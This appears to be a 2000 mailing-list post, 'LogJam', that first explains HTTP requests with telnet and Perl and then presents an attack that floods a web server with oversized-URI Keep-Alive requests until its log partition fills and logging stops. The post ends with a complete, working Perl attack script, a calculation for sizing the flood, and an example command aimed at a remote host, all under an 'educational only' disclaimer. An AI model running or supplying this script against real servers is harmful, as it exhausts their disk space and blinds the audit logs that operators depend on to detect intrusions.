LogJam Anton STIGLIC Fri, 25 Feb 2000 15:31:25 -0800

LogJam
by CryptoPunk

The following information is described for the purposes of education only.
I do not condone the use of this information for illegal purposes, nor am I
responsible for any misuse of this information.

INTRO

Several web servers log every request you send them. Your IP address, the
time, and the page you asked to retrieve are logged. Some servers go beyond
that and will even log the previous web page that referred you to theirs,
your e-mail address, the time your mouse stays on a certain image, and
more. Web servers are tracing your identity and keeping track of your
movements and habits; this is an invasion of your privacy. Think of a web
server as a public grocery store: in society you have the right to go buy a
loaf of bread without having the grocery clerk scan you, without revealing,
for example, your telephone number, your social insurance number, or the
store you went to just before. In the same manner, one should be able to
surf the web without being traced.

LOG FILE

Servers that keep track of your information store it in a file called a log
file. Every request you make can be stored in such a file. Web servers can
choose not to log information and let you surf their pages anonymously, but
many prefer to keep track of you.

HTTP

I'll describe a simple attack to which web servers that log information are
vulnerable, but first let's discuss how web surfing is done. Web surfing is
accomplished through the use of a protocol called HTTP (see RFC 2068 for a
description). We call the person who is requesting information from a web
server the client. The way HTTP works is that a client (usually through the
use of a web browser) constructs an HTTP request, which normally contains
the URI (Uniform Resource Identifier) and some other information, like the
version of the HTTP protocol the client understands.

So let's say we want to request a web page from a web server
foo.server.net. We simply need to create a socket connection to
foo.server.net on the port that is used by the server for HTTP (usually 80,
so we'll use that in our example). You can manually request a page (say
foo.server.net/index.html) with telnet like this:

%> telnet foo.server.net 80

You'll get a telnet prompt, in which you type the following:

GET /index.html HTTP/1.0

followed by two carriage returns. This will print out the HTML page you
requested; that's the web page. It's as simple as that.

HTTP version 1.1 has some other nice features, like Keep-Alive connections,
in which you keep a persistent connection and thus send multiple requests
over the same TCP connection (and the client doesn't need to wait for a
response to be able to send its next request; this is called pipelining).
So, for example, say we want to fetch /index.html and then
/introduction.html; we can send the following commands at the telnet
prompt:

GET /index.html HTTP/1.1
Connection: Keep-Alive
Host: foo.server.net

GET /introduction.html HTTP/1.1
Connection: Keep-Alive
Host: foo.server.net

If you wait too long between commands, the server will close the
connection. Note the extra Host header: you have to put this in for
HTTP/1.1.

It's possible that you might mistype a certain command, URI, or whatever.
The web server returns a 3-digit status code after each request: codes of
the form 2xx indicate successful requests, and codes of the form 4xx
indicate that the client sent a bad request (see RFC 2068 for more
details). Common errors are:

400: Bad Request (your request was malformed).
404: Not Found (a URI was given which the server cannot find).
413: Request Entity Too Large.
414: Request-URI Too Large.

When is a request URI too large? That depends on the web server; it is not
defined in the standard. Most servers will accept decently large URI
requests, especially if they have some CGI stuff that redirects you to one
of many possible web pages.
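If you'd rather script it than telnet, here's a minimal Perl sketch of the
same HTTP/1.0 request, using the standard IO::Socket::INET module
(foo.server.net is just the placeholder host from the example above):

#!/usr/local/bin/perl -w
# Minimal sketch: fetch /index.html over HTTP/1.0 and dump the response.
use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => 'foo.server.net',
                              PeerPort => 80,
                              Proto    => 'tcp')
    or die "connect: $!";
$sock->autoflush(1);

print $sock "GET /index.html HTTP/1.0\r\n\r\n";   # request + blank line

# The first line that comes back is the status line (e.g. "HTTP/1.0 200 OK"),
# followed by the headers, a blank line, and then the HTML page itself.
print while <$sock>;
close($sock);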
LOG_JAM

If a server is logging, it will probably log the URI you request. It almost
always logs your IP address, so you are NEVER ANONYMOUS if you send
requests over a clear, direct connection. If the web server is snoopy, it
will log a whole bunch of other stuff as well. By requesting pages with a
very large URI (or putting large strings in some other headers), multiple
times, you can force the logging to jam, just like tree trunks that pile up
on a river and block the passage of canoeists. If the web server is not
logging, there is no problem; if it is logging, you can fill up the disk
partition that contains the log files and thus force it to stop logging.

How big is the partition that contains the log files? That can vary from
web server to web server. Small servers may have something like 70 MB
allocated for that partition, slightly bigger ones something like 2 GB, and
bigger ones something like 36 GB (that's the biggest hard drive I've seen
on the PIIIs being sold nowadays). On my localhost, I've got my log files
in a 70 MB partition. By sending multiple URI requests of 7500 bytes (my
server accepts those without returning a 414 error), I could fill up my
whole /var partition in about 20 seconds. This was done locally, though;
over the Internet, you have to factor in some delay time (you can figure
out that delay with the information given to you by ping, for example).
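Before picking a value for the script's --reps option below, you can make a
back-of-the-envelope estimate of how many oversized requests it takes to
fill the log partition. This is only a rough sketch: it assumes an
Apache-style common log format in which each entry is roughly the URI
length plus some 100 bytes of fixed fields (IP address, timestamp, status
code, and so on); the exact per-entry overhead depends on the server's log
configuration.

#!/usr/local/bin/perl -w
# Back-of-the-envelope: how many logged requests fill the log partition?
$partition = 70 * 1024 * 1024;  # size of the log partition (70 MB, as above)
$uri_len   = 7500;              # URI size that got logged without a 414
$overhead  = 100;               # assumed fixed bytes per log entry
printf("roughly %d requests\n", $partition / ($uri_len + $overhead));
# prints: roughly 9657 requests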
CONCLUSION

This attack has been described for educational purposes and as a social
reflection on web servers' habit of logging information.

#!/usr/local/bin/perl -w
########################################################################
# Title: LogJam
# Usage:
#    LogJam --reps NB_REPS --remote R_NAME --port PORT
#    where NB_REPS is the number of Keep-Alive connections to open; each
#              connection carries $MAX_KEEP_ALIVE URI requests. The
#              amount needed will vary depending on the size of the
#              /var partition of the server.
#          R_NAME is the name of the remote host server; if not given,
#              this will take on the value 'localhost'.
#          PORT is the port number; if none is given, this will take
#              the value 80.
#
# Warning: This Perl script is for educational purposes only.
#          I do not condone the use of this script for illegal
#          purposes, nor am I responsible for anything that is
#          done with this script.
########################################################################

require 5.002;
use IO::Socket;
use Getopt::Long;

$MAX_KEEP_ALIVE = 10;  # A Keep-Alive connection will die after a certain
                       # number of bad requests. That number depends on the
                       # size of the URI requests you are sending; 10 worked
                       # for me, but this can be modified.

&GetOptions("reps:i"   => \$reps,
            "remote:s" => \$remote,
            "port:s"   => \$port);

if ( ! $remote) { $remote = 'localhost'; }  # default to localhost
if ( ! $port)   { $port = 80; }             # default HTTP port is 80
elsif ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }

$iaddr = inet_aton($remote) or die "can't find host: $remote";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');

# I made the string size such that a GET request with this URI would not
# return a "414" (Request-URI Too Large) on the Apache server I was
# testing on. The value can be changed; you just want it to get logged.
$uri = "LLL" x 2500;

$sent = 0;
while ($reps--) {
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
    connect(SOCK, $paddr) or die "connect: $!";
    SOCK->autoflush(1);
    for ($i = 0; $i < $MAX_KEEP_ALIVE; $i++) {
        # We send an HTTP/1.1 GET request with Keep-Alive. Other things
        # can be added here (or modified): you can simply make an
        # HTTP/1.0 request, or put in extra headers that the server
        # might be logging (Referer?).
        print SOCK "GET /".$uri." HTTP/1.1\n".
                   "Host: $remote\n".
                   "Connection: Keep-Alive\n".
                   "\n";
        $sent++;
    }
    close(SOCK) or die "close: $!";
}
print "Sent ($sent) blocks of junk to remote host ($remote)\n";
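For example, against the 70 MB /var partition described above, the estimate
of roughly 9700 logged requests works out to about 1000 connections (since
each connection carries $MAX_KEEP_ALIVE = 10 requests), so an invocation
might look like this:

%> perl LogJam --reps 1000 --remote foo.server.net

The host defaults to localhost and the port to 80, so you only need to give
the options you want to change.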